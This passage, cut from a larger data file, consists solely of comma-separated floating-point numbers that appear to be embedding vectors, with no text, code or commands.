019948546,0.0012161832,-0.01752027,-0.0063755577,0.012533441,0.002712565,-0.010519643,0.0031143269,-0.0022788746,0.017553126,0.002135054,-0.008915835,0.020262564,0.005411828,0.0022078727,0.010572952,-0.025992606,0.0012465528,-0.008173372,-0.016027704,0.0062102913,0.007563393,-0.0033257967,0.010005067,0.005144083,0.0022678273,0.016988073,-0.014293679,0.018507432,0.007211948,-0.014346092,0.009706714,0.008740323,0.0015027334,0.013671506,-0.015311806,-0.0055605234,-0.0003937103,-0.017539281,-0.011809448,-0.013012162,0.0033995328,-0.085333854,0.01568724,-0.0032492573,-0.013012671,-0.009969514,-0.017778132,-0.0077300784,0.016968213,0.0031691226,-0.049457416,-0.003922001,0.019149443,0.0045856927,-0.0054689758,0.0017870519,0.009386674,-0.009569985,0.015246174,0.0047262395,0.01337443,0.0055075297,-0.0054347333,0.0019428633,-0.012470044,0.008277649,0.006287656,-0.0093786,0.001995485,0.0030027428,0.0028610756,-0.009124925,0.0012287003,-0.008528016,0.020882318,-0.009838645,0.0021800771,-0.0013754459,0.0012883279,0.010249825,0.024633436,0.0020728821,0.0075648483,-0.0026190619,0.0058888295,0.0321058,0.01873156,0.008211812,0.002019748,0.013514952,0.028583447,-0.027625522,-0.0011400109,0.008374999,-0.0057979017,0.002867103,-0.028923804,0.00667211,-0.014682621,-0.001465652,0.00058093556,-0.016187489,-0.010770564,-0.0020767367,-0.006707031,-0.0022974692,-0.004448355,0.000226656,-0.0075031966,-0.026289884,0.006208536,-0.02410258,0.014033485,0.009593074,0.008164785,-0.0058820504,0.016534032,0.013738972,-0.013331761,-0.008467579,0.012837997,-0.027644863,0.00041352626,0.011900548,-0.002922105,0.009588734,-0.019775629,0.0074274875,0.016331192,0.01245391,-0.0033063455,0.018993573,0.006441662,-0.014657617,-0.018096887,0.009043605,0.011737072,0.003700034,0.017682869,-0.01656041,-0.012669128,-0.0051021893,-0.009308035,-0.0049435482,-0.025525047,-0.090496406,-0.01566047,0.020740079,-0.0069704414,-0.009040973,-0.007140888,0.024092184,0.0015217602,0.02169168,0.010027214,-0.025008013,0.018230358,-0.033958767,-0.003864689,-0.018263001,0.023352541,-0.028658941,-0.018165879,0.030195529,0.0033736299,0.0026216265,-0.014086433,-0.005122296,0.006555864,-0.00541904,0.026561432,-0.006653327,0.050506867,0.033119343,-0.014974154,0.0075734383,0.01872034,-0.02179913,0.014984772,-0.031952593,0.0053571938,-0.00041428927,-0.0043651164,0.022594556,0.0055918675,0.004182073,-0.0054904185,-0.0048685116,0.009727202,-0.007721263,-0.0074966536,-0.020564541,0.03627564,-0.004492147,0.019956747,0.011115424,0.0047677625,-0.0020752982,-0.01933693,-0.018993504,0.002317687,0.0022595853,0.009846131,-0.012439557,0.018714381,-0.0009901099,-0.02240064,-0.006382173,0.020047348,-0.00950356,0.0122140255,0.013407194,0.011169946,-0.00006190636,0.021714123,0.00045256622,0.025707707,0.0137264365,-0.0150931,0.03749219,0.0070326687,0.0022852805,0.022296969,-0.009777001,0.014717189,0.000052454714,-0.03274539,-0.0012388431,0.004995172,-0.04921731,0.0040641665,0.0053648097,0.013076428,-0.012693439,0.0014151586,0.018580792,0.025015777,-0.0016986462,0.019432258,0.031017628,0.023644513,0.04749931,-0.010172184,-0.010961967,-0.0005882265,-0.029456647,0.0022458648,0.0051361606,0.0027808081,-0.020727728,0.0144070275,0.023890505,-0.02701171,0.01523558,-0.0048401,0.02015588,0.02225499,-0.03466459,-0.0074304026,-0.0046437816,0.019982409,0.0031416777,0.008636466,0.01088699,-0.0260225,0.009932665,0.0054625655,-0.011323188,-0.00006320451,-0.0033547948,-0.004012227,-0.014828531,0.021251284,-0.01323054,-0.022892732,-0.010046465,-0.0034638671,0.022233048,-0.02122359,-0.00123325,0.0049740076,-0.02710401,0.014723589,0.0045347516,-0.005493255,0.0006619189,-0.015828697,0.009063805,0.0042400714,0.003873718,0.011888048,-0.004072942,-0.027015701,-0.021873686,0.02010613,0.0032441162,-0.009784335,0.017306345,-0.0046645873,0.009490893,0.003631823,0.0056115864,-0.0054847663,-0.012354346,0.021097558,-0.0070157126,0.017500538,0.016430032,0.0024761388,0.00221967,-0.004010205,-0.011297106,0.015333854,-0.006181442,0.0076553184,0.0043691476,-0.019804977,0.023265023,-0.07456957,-0.01447802,0.01278839,0.015668463,0.00916373,0.027311716,0.032631397,-0.016614193,0.0028830278,-0.004050114,-0.0009626944,-0.0068416554,0.015917515,0.002048367,0.009263754,0.000057929938,0.0014078042,0.04292337,0.013963236,0.012195239,-0.0360001,0.018475568,-0.011215981,-0.0017285456,-0.019674616,0.008138267,-0.013548179,-0.014164084,0.026557133,-0.007879936,-0.048058234,0.006220771,-0.015885597,0.0026056634,0.050315123,0.02041492,-0.015871877,-0.00992946,0.039809804,-0.025421208,-0.014769877,0.0088350745,0.04138292,-0.023392627,-0.013976842,0.024726914,-0.012049811,-0.002162333,0.014028945,0.010253099,-0.013747958,-0.0060645435,0.03075964,0.014649163,0.00842292,-0.013403987,-0.017880887,0.004540116,0.008607197,-0.017736997,0.017250616,-0.0048061493,-0.0203669,0.011820507,0.0007803841,0.009825334,0.006841704,0.023480628,0.0007190313,0.026355606,0.035108276,0.029120281,-0.0042607617,-0.0038875332,0.008704583,0.02835401,0.04948091,0.008656637,-0.009786236,-0.009034018,-0.0027529583,0.03066274,-0.0018575157,-0.016242472,-0.0019234989,-0.007298272,0.031782106,-0.018676512,0.012835859,-0.027194409,0.007281727,0.0013898808,0.009476407,0.017818436,-0.008865425,-0.005547085,0.022041481,0.013707735,0.01500494,0.0005830633,0.0027398844,-0.020919451,-0.013088673,0.013404391,0.0022252584,0.004356863,0.01564804,-0.004017122,-0.003646453,-0.02584425,0.0019904282,-0.005518385,0.031919703,-0.0042854054,0.008847775,0.014992127,0.004608707,0.0060442616,-0.015131712,0.010288179,-0.0040319446,-0.0074828044,0.020726027,0.007340379,-0.017785186,-0.011913923,0.011641457,0.014100494,-0.013108718,-0.021008214,-0.010383733,0.028507097,-0.007974473,-0.004518857,0.020407127,-0.010495195,-0.027391786,0.013804322,0.009488863,-0.021187108,0.012532466,-0.0030601092,0.01996265,0.007584203,-0.008701653,-0.022988202,-0.012948748,-0.0098286765,0.006190143,0.0041050673,-0.015834183,0.011459516,0.003278017,0.005254247,0.0361861,-0.0074956147,-0.023150118,0.023448795,0.028092636,-0.015823454,-0.003618647,0.010903377,-0.003955215,0.019488275,0.033255953,-0.0050867517,0.0039622914,-0.00259826,0.017254202,0.0070020175,-0.015466295,0.019914683,0.0062460224,0.011362834,0.008622839,0.0010379973,0.002197405,0.013307227,0.017341666,-0.0032604707,-0.011216885,-0.007849589,0.04137748,-0.036018997,-0.0003276284,0.01080203,0.009819914,-0.0015866499,0.0058132913,-0.038456015,0.00928588,-0.001194583,-0.004561265,-0.0152390115,0.028446361,-0.018793372,0.009914032,-0.001898551,0.0060578994,-0.01845052,-0.015670618,-0.0055279266,-0.08648247,0.0074147973,0.022032632,0.014125173,0.04412151,-0.019233678,-0.0055324784,-0.010003384,-0.005278767,0.013359399,-0.0040549617,-0.022723611,0.011430746,-0.0075460477,0.0265056,-0.018776774,0.0050930553,-0.011356664,0.0131833395,-0.014256795,-0.009966415,-0.0063923867,-0.00868838,-0.007831094,0.013144364,0.016857821,0.0023549632,-0.015361407,0.013426898,0.0023974848,0.014642671,0.018069359,-0.003875196,-0.0051668715,-0.012257256,0.011319326,-0.011744085,-0.007570285,0.008316957,-0.030590756,-0.009084544,-0.018736398,0.0030151154,0.009725229,-0.026181493,0.0042908625,-0.03720987,0.0058395,-0.00390158,-0.017038267,0.017647402,0.022264022,-0.0002963616,0.016428731,0.009334985,0.008448604,0.009888755,-0.011140853,0.017887633,0.003261603,0.0035103092,0.008334367,0.00301461,-0.007014711,0.0029077337,-0.012340239,-0.009139696,0.01895309,-0.0009832825,0.013167652,0.02251589,-0.029382428,-0.0013890838,-0.00060302415,-0.010534841,-0.0025892537,0.007089265,-0.014197126,-0.015934229,0.0030024839,0.043291677,-0.014360475,0.024802154,0.0113203125,-0.007124155,0.0068620103,0.008124157,-0.006984697,0.0064760526,-0.015631698,0.0166954,0.0041192467,-0.007945778,-0.00078561006,-0.0018180233,0.0029064873,-0.023260087,0.016465712,-0.0069366735,0.0061372393,-0.0240857,0.0187836,-0.008255018,-0.014580325,0.00070705917,-0.008479021,-0.0057299156,-0.02445461,-0.008163409,-0.0052894843,-0.015171555,0.033386435,0.02868115,0.026078893,0.013303639,0.014962516,-0.007938277,0.015580703,-0.029929904,-0.009463087,-0.022669448,0.012498086,-0.020583391,0.023772571,0.026507495,-0.0032630798,0.016879994,-0.0017136411,-0.01635283,0.01253619,0.0006614682,0.008397701,0.013481767,0.010508547,-0.02773617,-0.0070564565,-0.03650416,0.012018793,-0.0025060943,0.020819401,-0.0027343282,-0.015934998,-0.00034971087,-0.000690006,-0.02132476,0.01361184,-0.00011165127,-0.008029166,0.002556519,-0.034710526,-0.008314922,0.013498831,-0.018728461,-0.0028130605,-0.012858341,0.0067546894,0.0020452347,0.015540991,-0.0034580193,-0.02394021,0.012255421,0.031311467,0.0009781736,-0.020754987,-0.0134809995,0.0064209425,-0.0008189808,-0.0048966277,-0.022992898,0.008592201,-0.03439765,-0.0011580205,0.0057960325,-0.014439932,-0.00633821,-0.0051413914,0.029994344,0.0057709864,-0.010704188,-0.009345614,-0.03539289,0.012162942,0.002006591,-0.021885335,-0.0054569687,-0.009587632,-0.0020512315,0.009147724,0.008837823,0.00038891516,0.0031369515,-0.02244112,0.0038340944,0.012860703,-0.00927315,-0.006654268,0.009261568,-0.007450756,-0.021883221,0.017620752,-0.010287077,0.0101963,0.0007435811,0.013495127,0.03495296,0.016101623,-0.005224148,0.018826652,-0.028904956,-0.013427061,-0.005433886,0.013020194,0.018553577,0.12119198,-0.007150878,-0.007351044,0.0019450157,0.02164633,0.0064295894,0.007914259,-0.01647631,-0.00009383375,0.004823415,0.012640339,-0.020223469,0.012482521,-0.019984268,-0.0061957063,0.025961818,0.02774591,-0.04239323,0.005413185,0.012722111,0.029481972,-0.02119627,-0.012589727,-0.05865764,0.00022875782,-0.07327473,0.019527316,0.016626634,0.003995268,0.028455343,0.007790257,0.0068197665,0.025700858,0.012836423,-0.008787326,-0.000010163717,0.0074427216,-0.01938542,0.015118293,-0.008133391,0.024722766,0.014065904,0.014930132,-0.02626311,-0.0034908657,-0.009963972,0.0032621124,0.014399336,0.014864403,-0.005390798,-0.0017430756,-0.00041702102,0.012361481,0.00646906,0.011651126,-0.010331972,0.017643094,-0.015694365,0.02604078,-0.011546601,0.026049666,-0.0037287688,-0.00025615896,-0.011878666,0.0053852983,-0.0120224655,0.009293952,0.0138518745,-0.025118826,-0.0016756798,0.013794235,0.020627016,0.005619862,0.0017750042,-0.0018381423,0.016426949,-0.016791018,-0.0013563434,0.009761162,-0.019718196,0.004340375,0.0075345715,0.010027772,0.013191314,0.014775492,0.0028464475,-0.022862738,0.003307188,-0.0037084927,-0.005127678,0.004362036,0.012469426,0.015052099,0.023048736,-0.015773395,0.0005979675,0.021704728,-0.00401721,-0.006475511,0.025911642,-0.026429506,-0.013465524,-0.00658165,0.0057823337,0.0071523935,-0.0020364423,-0.0036273834,0.0386803,-0.007599664,0.007327681,0.0034045232,0.0066643343,0.012900177,0.011749737,0.019349463,0.035112914,-0.03395754,-0.023262149,0.019269101,-0.015725527,-0.0058779893,0.01416035,0.021746755,0.042456575,0.021281546,0.021146845,-0.018705769,-0.00048264672,-0.004970222,-0.0082951365,0.0029606968,-0.03386367,0.0010479958,0.023275012,0.006029204,0.010569478,0.02875524,-0.02200067,0.014140653,-0.013073093,0.025997143,0.0013528145,-0.0102874795,0.026639692,0.0059261867,-0.015637556,0.003598833,0.0072826557,0.0060726516,0.018211106,-0.00024181201,0.011663511,-0.016654152,-0.014099019,-0.00530709,-0.011436166,-0.005841212,0.007178377,-0.016380444,-0.012258955,0.0031280958,-0.0059421198,0.015940642,-0.033489652,0.009032557,0.014949351,0.0050927014,0.009494016,0.008310257,0.014815772,-0.014295402,-0.010916071,0.0036412384,-0.00082637504,-0.015936816,-0.0022203,0.0064998497,0.03350683,0.013061179,0.020648485,0.017371383,0.0037126006,-0.0024569114,-0.008164825,0.01703896,0.004618166,0.017066365,0.004518956,-0.01913086,0.0044110618,0.0006271661,0.014925156,0.0036518534,0.022362113,-0.01187883,0.0013723955,-0.017287478,0.018568935,-0.026239315,-0.026457759,-0.0104692625,0.015658194,0.025719238,-0.016726715,0.01093467,-0.0056459606,0.0009049837,-0.0000124939215,0.0062501254,-0.02085159,0.0057144724,0.0040832646,-0.0021650684,-0.020241125,-0.006396557,0.0013903751,-0.004524642,-0.020313067,-0.021870255,-0.01806169,0.02159994,-0.008628924,-0.00942493,0.01716223,0.00511165,0.0077185538,-0.037542503,0.010297095,0.014105667,-0.02883297,-0.0036601038,-0.017555196,-0.0137754055,-0.011151219,-0.028403616,-0.00029470175,0.01917219,0.014943066,0.008284356,0.03041076,-0.0014535581,-0.0007998073,-0.0027760437,-0.002518522,-0.014894328,0.014233719,-0.00092182675,-0.0064296983,0.014838516,-0.011601457,-0.0124627035,-0.009402387,-0.0065284786,-0.02229865,-0.026470281,-0.026156,0.007253545,0.021965666,0.02603999,-0.00749421,0.032164536,0.0017898353,-0.0037122536,0.018115703,0.0014558379,0.006139723,0.0048076822,0.012008861,-0.019145863,-0.021207228,-0.0055981614,0.014036541,-0.004584117,0.024598846,-0.0070793866,0.024121452,0.001568083,-0.011661346,0.0074671526,0.004775448,-0.017596753,-0.028613541,-0.006172275,-0.003430312,0.015004751,-0.032632858,0.018384643,0.0051021213,0.045103043,-0.053909425,-0.004584821,0.019068839,-0.028668389,-0.018884024,0.02357414,0.012341721,-0.018442616,-0.026081735,0.0077721383,-0.006268914,-0.00081854686,-0.028326504,-0.003218856,-0.00075410533,-0.017609935,0.008994398,-0.002841295,-0.006188337,-0.009352857,0.020047842,-0.020308403,-0.002187517,-0.036848333,0.018850153,-0.00482211,-0.0033899508,0.00054865587,-0.012458174,0.014354063,-0.013061145,0.016291082,-0.02426673,0.008077509,0.0064164726,-0.00060549745,0.005456237,0.0012028982,-0.039151285,-0.015171869,-0.0024068367,-0.003178079,-0.020328036,-0.012270739,-0.03568896,-0.014186069,0.0019154175,0.0012734004,0.14651532,-0.026032375,0.011334585,-0.009387143,0.007696744,-0.029094163,0.04090725,0.017824905,-0.023405217,0.007854822,0.022632767,-0.005395091,0.0048089954,0.016250415,-0.0050653205,-0.005125884,0.008664447,0.14489469,-0.0021821049,0.030011402,0.0064997324,0.008801554,-0.0075107845,-0.008725187,-0.0032051795,-0.051809993,-0.011550432,-0.023921328,0.00042526601,-0.005826154,-0.027946973,0.020382825,0.00019801028,0.00057061494,-0.00232789,0.013759578,0.010879481,0.012596899,-0.013346214,-0.0067197024,0.017710142,-0.0029476539,-0.0014161309,-0.0032842502,-0.0057023335,-0.00014199849,-0.023706408,0.0050091874,0.0022808344,0.047675878,-0.015012375,-0.025678737,-0.0023202351,0.02667866,0.024450818,0.0028697564,0.015759282,-0.008321526,-0.017970359,0.017985588,-0.0035743657,0.022677558,-0.019803578,0.051907204,-0.0001466144,-0.0016306938,-0.020703107,0.0030846547,0.007312536,0.026702235,0.015432032,0.0062712594,-0.005044388,-0.0046044555,0.046545338,0.0053690113,-0.024404276,0.002174651,-0.0054730023,0.006497263,0.017822962,0.0029172897,-0.014122119,0.011671541,0.02408808,0.00068339927,-0.017504366,-0.024931444,0.020862624,0.008405796,-0.010669242,0.009193461,-0.007342429,-0.0018033903,-0.0022097586,0.022241957,-0.0057599354,-0.010470543,-0.0021630756,0.0010299366,0.004298197,0.009619551,-0.011693509,0.00057023845,0.013259159,0.014042238,-0.027993578,-0.018133549,0.007999535,0.014332981,0.00029194457,-0.011285495,-0.012119316,0.010914094,0.0012388251,-0.004025607,-0.0012180677,-0.038596306,-0.034998883,-0.0051578246,-0.00025918236,0.001854095,0.008276233,0.0055556595,-0.009611141,0.026153611,0.03895057,-0.006891467,-0.023170002,0.004550448,0.0114894705,0.002544034,0.007364487,0.027032498,-0.029613497,-0.010706749,-0.011853112,-0.05571847,-0.023928657,0.0023286743,0.00587851,0.014525948,0.0069625773,-0.020534296,-0.0032084703,-0.0056211753,0.006612874,0.007852592],[0.019560551,0.005490168,-0.023274232,-0.02258167,0.014716677,-0.025980802,-0.0014815868,0.016173497,-0.00477608,-0.006913833,-0.0064226263,0.00941422,0.0031414514,0.010776723,-0.0086747445,0.0045609465,-0.0028136354,-0.0030651565,-0.004589864,-0.01408117,0.0027724802,-0.00077324273,0.011627528,-0.011946366,0.0024927505,0.0012483996,-0.009921561,-0.0012349628,0.0247698,-0.006169212,-0.015783543,0.030587878,0.006274102,0.018882144,0.017629055,-0.006486489,-0.025144748,-0.00050165184,0.014039309,-0.016569773,-0.0067290645,0.017091468,0.003917033,0.03707443,0.00077158085,-0.0019026977,-0.0107060615,-0.00015062733,-0.016054664,0.007875263,0.012499408,-0.008939982,-0.041721657,0.0046711736,-0.011302324,0.018688729,-0.0070181615,-0.017860126,0.026956838,-0.018000275,-0.0047440785,0.019892508,0.014497323,-0.024555719,0.01690438,0.009639072,-0.005045243,-0.030351486,-0.0052768453,-0.007052241,-0.0040971,-0.013616775,0.005857875,-0.010433316,0.026655165,0.011650336,-0.0060078334,-0.0032316674,-0.020932376,0.02245473,-0.010348062,-0.0076193255,-0.009229381,0.005263302,0.025294434,0.018786212,-0.0016062536,-0.008428805,-0.0015516744,-0.02549743,0.003167956,0.019412532,0.016723353,0.009986889,-0.018662138,0.011496807,-0.0060268044,-0.018912219,-0.0022607262,0.011169649,-0.010949746,-0.0058035166,-0.013172704,0.004532132,-0.009178036,0.0035532499,-0.013425007,-0.02182737,0.002655389,-0.011608435,0.00063500676,0.007314748,-0.0007430414,0.008742274,-0.0028280257,0.00032004624,-0.0029213317,0.005849587,-0.0035537123,0.008996154,0.0028203705,0.015978334,0.016238593,-0.0073565478,-0.035086486,-0.0052132113,-0.005946823,0.0129074035,0.0040827314,0.020090684,-0.015634488,0.010172068,-0.020936936,-0.016003035,0.006377321,-0.0020400812,0.018903723,-0.0007804332,0.0012844858,-0.0051099616,0.012163822,-0.0013248976,0.01315116,-0.00019657827,0.020546198,0.019917896,-0.00047018653,0.010582915,0.021238424,-0.01823086,0.010204252,-0.002800143,-0.01656575,-0.0020414023,0.003324156,0.01653902,0.008125614,-0.023813833,-0.02021958,-0.018816872,-0.0059115393,-0.009707982,0.008011247,-0.01894506,-0.00051332044,-0.032727458,-0.0015694743,-0.007118642,-0.01446022,0.007754912,0.033654496,0.024491847,0.01712531,0.009829267,0.01072465,0.017124508,-0.022648536,-0.0027862126,-0.016746745,-0.012990579,0.012038901,0.007157047,0.0048974003,0.0009492449,-0.004207133,0.03449072,0.020193823,0.014547704,-0.016842917,-0.01715706,-0.0013961477,-0.027515598,0.0066107083,-0.0048624105,-0.012438193,-0.023208655,-0.021136949,0.08193986,-0.003989755,0.0013803645,-0.005084939,-0.00604163,0.00084781507,-0.033580612,-0.0053023985,0.0003930068,0.022704339,-0.015971335,-0.00044886934,-0.014860682,0.010629842,-0.036275566,-0.007229433,0.000067612295,-0.002775534,-0.049085308,0.03146052,0.009105598,0.023406068,-0.0029396638,-0.0125904055,0.00444399,0.000982987,-0.016298864,-0.004237572,-0.0046657505,-0.001561698,0.011533516,0.0025261487,-0.031274732,-0.018317912,0.0010032585,-0.010704121,-0.022253469,0.012004631,-0.019389134,0.0085851075,-0.027594732,-0.012849694,-0.0016358789,0.004655175,-0.0031910304,0.010175952,0.014248178,-0.0054002,-0.004743996,-0.0002881669,-0.00042329342,-0.0073747938,0.017764824,0.012250908,-0.005046057,0.020705042,0.020566095,-0.003274599,-0.028984904,-0.002404052,-0.008499751,0.01801448,-0.0048338324,0.045082632,0.024385419,-0.027696785,0.0382958,0.010101096,-0.012066092,0.00875001,-0.028747192,-0.00519902,-0.021579254,-0.020849587,0.017807484,-0.0064071915,-0.0033552046,0.007724714,-0.021736197,0.01718455,-0.003973691,-0.0004612138,-0.010061674,0.0030693577,0.0036809074,0.0011529741,-0.029790418,0.0047548646,0.01789014,-0.0025427423,0.01587892,0.033327445,0.0050570956,0.008106308,0.011296504,0.032167062,-0.01569606,-0.012860355,-0.005049985,-0.018114595,0.013691487,0.020972963,-0.012897542,-0.006593014,-0.012353842,0.01654863,-0.0065851524,0.0012255865,-0.0141180195,-0.017838296,0.041274603,-0.025987562,0.017043667,-0.050959818,-0.0009493944,-0.024617098,0.0069700177,0.009898355,0.008685391,-0.020209737,0.00063842227,-0.018372865,-0.00392274,0.013106396,-0.0049392176,0.042862862,-0.027855512,-0.0137553215,-0.0051018586,-0.0036296917,-0.020806827,0.02406614,0.0021207775,-0.0027191602,0.0051922635,0.026797876,0.024439307,-0.012874589,0.010711036,-0.009828584,0.002053783,0.0029632808,-0.0193703,-0.023437234,-0.019068018,-0.012098667,0.017982913,-0.0022434243,-0.0067360164,-0.0055739265,-0.0010720392,0.004179922,0.014998293,0.015128785,-0.026053257,-0.009322107,-0.00505281,-0.025982022,-0.010078425,-0.023127671,-0.018576099,0.013054572,-0.018296162,0.026333988,-0.008047326,-0.023747489,-0.00382266,0.06049303,0.017176272,-0.015358479,-0.0002627841,-0.004353324,0.013775661,0.035316046,-0.0006255768,-0.002723235,0.008258345,-0.0032508487,-0.009495387,0.0018374536,0.017192494,-0.0006369269,0.0021481873,-0.021725427,-0.007945987,-0.03473965,-0.031788833,0.017182041,-0.016872825,-0.012140436,0.00289945,0.0050956574,0.019143723,0.008031368,0.002319574,0.004168245,-0.008084318,-0.015044922,0.0148960315,0.026330922,0.009720631,-0.029440802,0.008286007,0.006564871,-0.002185985,-0.024657667,0.0053672562,0.005136156,0.0076567912,-0.0014124006,-0.014022967,-0.018108927,0.035057507,0.002531461,-0.021674888,-0.014123655,0.02795052,0.023843389,0.0056748083,-0.020192565,0.008209815,-0.012510658,0.016760744,0.012256844,-0.038518358,0.054839347,0.035277184,0.010045922,0.027569681,0.0022073498,0.0014764494,-0.019126574,0.017924638,-0.003025226,-0.016582321,0.009618838,0.017334836,0.0019106651,0.009969578,-0.006797348,-0.0038467906,-0.0013817404,0.0074825482,0.0039643925,-0.0152218,-0.0001368194,0.043077555,-0.017698934,-0.006843934,-0.010710377,0.009668146,-0.000086987275,-0.0033137081,-0.002718092,0.010586541,0.006430662,-0.012282418,0.006010522,0.008830845,0.024647543,0.00392206,0.019651067,0.034735,0.0100822635,0.01845028,0.0032136932,0.0062728007,-0.00043723092,0.0134906005,0.0014240687,-0.021973142,0.002945983,0.0029838826,0.0012331235,-0.0056783115,0.00022229247,0.044759836,-0.011582547,0.01387143,0.0055456064,-0.018447947,-0.0064735217,0.009309925,-0.0038350644,-0.024639778,-0.007377172,-0.0055408883,0.031534705,-0.007313069,0.014647208,0.012212675,0.004330173,0.003954374,-0.0057545607,-0.030952433,0.015213824,0.02382284,0.010405622,-0.0010495449,0.018526895,-0.043175682,0.014909951,0.015787918,-0.015928086,-0.012598563,0.045700498,0.020247728,0.011081498,0.02348222,0.034563143,-0.0021799952,0.0001644524,0.016128583,0.043264583,-0.0022856346,-0.0054012663,-0.0020752694,-0.01403824,-0.0011542575,0.010715153,-0.011840718,-0.0035534753,-0.011730623,0.03811603,-0.0026859965,-0.027395379,0.015763007,0.021357937,-0.014347352,0.006090375,-0.00070599536,-0.010495061,0.02545739,-0.00768074,0.054469768,0.00042035195,-0.03693823,-0.014202795,0.0025039758,0.004423668,-0.00017271806,-0.0018164098,-0.010806926,0.0009836399,-0.02211839,0.019340571,0.0014778473,0.011252409,-0.021552334,-0.003061066,-0.00011212652,-0.008568502,-0.011228242,0.0036078533,-0.0011848011,-0.0048147026,-0.010211424,-0.011128864,-0.02051476,0.02893434,0.023076652,-0.0038208575,-0.033869088,-0.0088217985,-0.013444644,0.010207086,0.0046158875,-0.008515803,0.011155389,0.012585856,0.0015250966,-0.0049852612,-0.010210669,0.05580661,-0.0026927507,-0.000021516755,0.00565527,0.021273604,0.030483594,0.010137942,0.015634272,0.016685545,0.015199821,-0.010936727,0.008602534,0.02857149,0.02181807,-0.0032411825,-0.022064775,0.0007467934,-0.0017011767,0.003390342,-0.014553519,0.00665745,-0.006886867,-0.0047606793,-0.012097485,-0.025055572,-0.0051697446,-0.025435748,-0.0039727683,-0.00825252,-0.006310499,-0.029163169,-0.010784282,0.0065743746,-0.009913542,-0.0068852813,0.016119363,0.02839974,-0.0018201236,0.016912913,-0.002305527,-0.0105888145,0.015218294,0.025282048,-0.007456851,0.009090415,0.0148964245,0.026760932,-0.013884053,-0.015277681,0.012235431,-0.01910409,0.0058234,-0.01351504,0.021313448,0.010784712,0.019441381,0.005713183,0.011100934,-0.016479125,-0.0120523255,0.015017482,-0.021067437,0.022274844,-0.01851975,0.0025806152,-0.009230076,-0.0002512491,0.0016512203,-0.01093647,-0.017383369,-0.015251261,0.031642046,-0.048493374,0.0019777294,0.0064673577,0.00067509856,-0.0010349764,0.03676156,0.0017425099,0.011152812,-0.005803435,-0.02330023,-0.0009324381,-0.010430093,-0.0077461423,-0.007829119,0.014653334,0.0083871065,-0.022934139,-0.030596046,-0.012176708,-0.05797438,-0.0077662575,0.029325636,0.007765625,0.01256454,0.0054540206,-0.0034066415,0.009452211,-0.0035313629,0.0029886751,-0.032406546,-0.0006250628,0.01666086,-0.042749546,0.02238221,-0.002937437,-0.0014882445,-0.010830198,-0.03192939,-0.0031112179,-0.007575931,0.0048260055,-0.0044359416,-0.02102231,0.0103060575,-0.008794573,0.04002876,0.008633207,0.013154347,0.017446637,0.044187117,0.0015122886,-0.020279264,-0.013855767,0.011104328,-0.017455567,0.018533934,0.011711527,0.046639893,0.02065633,0.020702813,0.0009234401,0.0010189937,0.00603569,-0.0028856623,0.0008272706,0.054120902,0.010672924,0.008081588,0.029369412,-0.002599074,0.03856807,-0.004736131,-0.010038203,0.0042715105,0.010519176,0.014839932,-0.0021107863,0.02594849,-0.009411993,-0.0042853286,-0.018270345,-0.007684544,-0.022667775,0.020437215,0.0135907335,0.0049787574,0.013220834,-0.0011215836,-0.0010779774,0.0007402587,0.00454895,-0.012743412,-0.017076956,-0.025028735,0.019117499,-0.023802737,0.004458431,-0.055136234,0.011849451,-0.00066181185,0.018611321,0.0015081529,-0.03136162,0.00038717804,0.0019181629,-0.010888929,-0.02045931,-0.03964658,0.0043197577,0.019723527,-0.020167427,0.020290246,0.018668892,0.00579825,0.006789473,0.03197891,-0.014019825,-0.019149113,-0.0019629628,-0.023626305,0.020233454,-0.0019235469,0.027505605,0.016518336,-0.010555866,0.002874559,-0.001964507,-0.007690898,-0.014611931,-0.0124003105,0.022085108,0.009967433,0.0020304115,-0.032914106,-0.020265587,-0.010015325,0.0012309309,-0.047771573,-0.018091133,0.0036814143,0.0128251575,-0.00040019615,0.022653837,-0.0072626867,0.027617956,0.014588202,-0.011873817,0.007250089,0.007287437,0.0154812215,0.021112073,0.04577413,0.010111347,-0.040967215,0.00046278595,0.033903725,-0.012278092,0.02713864,0.009896402,-0.017252317,-0.034914106,-0.030062817,0.005600806,-0.0014339061,0.020868326,-0.0028593347,-0.043230616,0.020351345,-0.0057800594,0.025345432,0.016700985,0.01837588,0.012576042,-0.0051329546,0.0052368687,-0.0347032,0.00056898105,0.0007311839,-0.007029374,-0.0018399539,0.0045585795,-0.047902845,-0.028501626,-0.028771514,0.01315014,-0.011483941,0.013253734,-0.008503584,0.0055949725,-0.013144384,0.032471087,-0.0019815576,0.020011287,-0.017607884,-0.01142443,0.01104911,0.0042724637,0.022306351,0.0075323484,-0.013706512,0.060739223,0.0017671396,-0.012071773,0.017035289,-0.01959894,0.0058619627,0.0012423798,-0.0004953337,-0.008337177,-0.013739839,0.017432624,-0.02731842,-0.0024606674,0.029268304,0.008573284,-0.013109422,-0.012030033,-0.039076917,-0.025308633,-0.020480817,0.008242009,-0.02133958,0.019726522,0.0069971755,-0.0014162877,0.002218911,0.016712734,0.003850392,-0.0194137,0.006491007,0.022283506,0.0061729318,-0.016432043,-0.012613163,-0.00505028,-0.012818443,0.019602673,0.009481772,-0.0088859955,0.0016756731,0.023377175,-0.0049653603,-0.0075625284,0.018372014,0.010725063,0.00234193,-0.018776448,0.027818123,-0.010813264,-0.0020915996,0.01844182,-0.023031129,-0.0102999,-0.019365286,-0.006583056,0.0151077565,-0.06686897,0.0058056624,0.0020570278,-0.01830458,0.029358206,0.0037251348,0.002868936,-0.013601967,-0.0023327582,-0.011252053,0.0035675874,0.01665874,-0.006063869,-0.0062932936,0.004223167,0.004192091,-0.009211903,0.01034088,-0.005122466,-0.012776413,0.013377901,-0.013695007,0.0013728901,0.00010266498,-0.017828375,0.016103446,0.030952567,0.007255001,0.011768411,-0.02127873,-0.02269929,-0.0118895825,0.0066541466,-0.03334413,-0.008624117,0.004043343,0.014310106,-0.019893555,-0.012695316,-0.014355459,-0.06138156,0.03408577,-0.019714195,0.014349755,0.0060461136,0.00092085876,-0.01676751,-0.006125802,0.03090382,-0.018161945,0.012862699,-0.016248122,0.030219367,0.007032456,0.0010449835,-0.0037855,-0.01738044,0.006524965,0.0089139445,0.01577411,-0.0010837099,-0.0068692453,0.011163014,-0.0065590474,0.026979096,0.032708567,0.00033704526,-0.00820224,-0.043623827,0.011622436,0.010579784,0.0133021185,-0.0014944798,-0.0055221845,-0.014050513,-0.0145246005,0.0025792879,0.0056921677,-0.018420137,-0.0066364985,-0.011603502,-0.008325304,0.004427578,0.02038551,-0.018070372,-0.004681923,0.0056649316,-0.023556314,0.0047151973,-0.0064446586,0.026345327,0.011328364,-0.027408335,0.01713345,0.0060906485,0.03759146,-0.005392407,0.023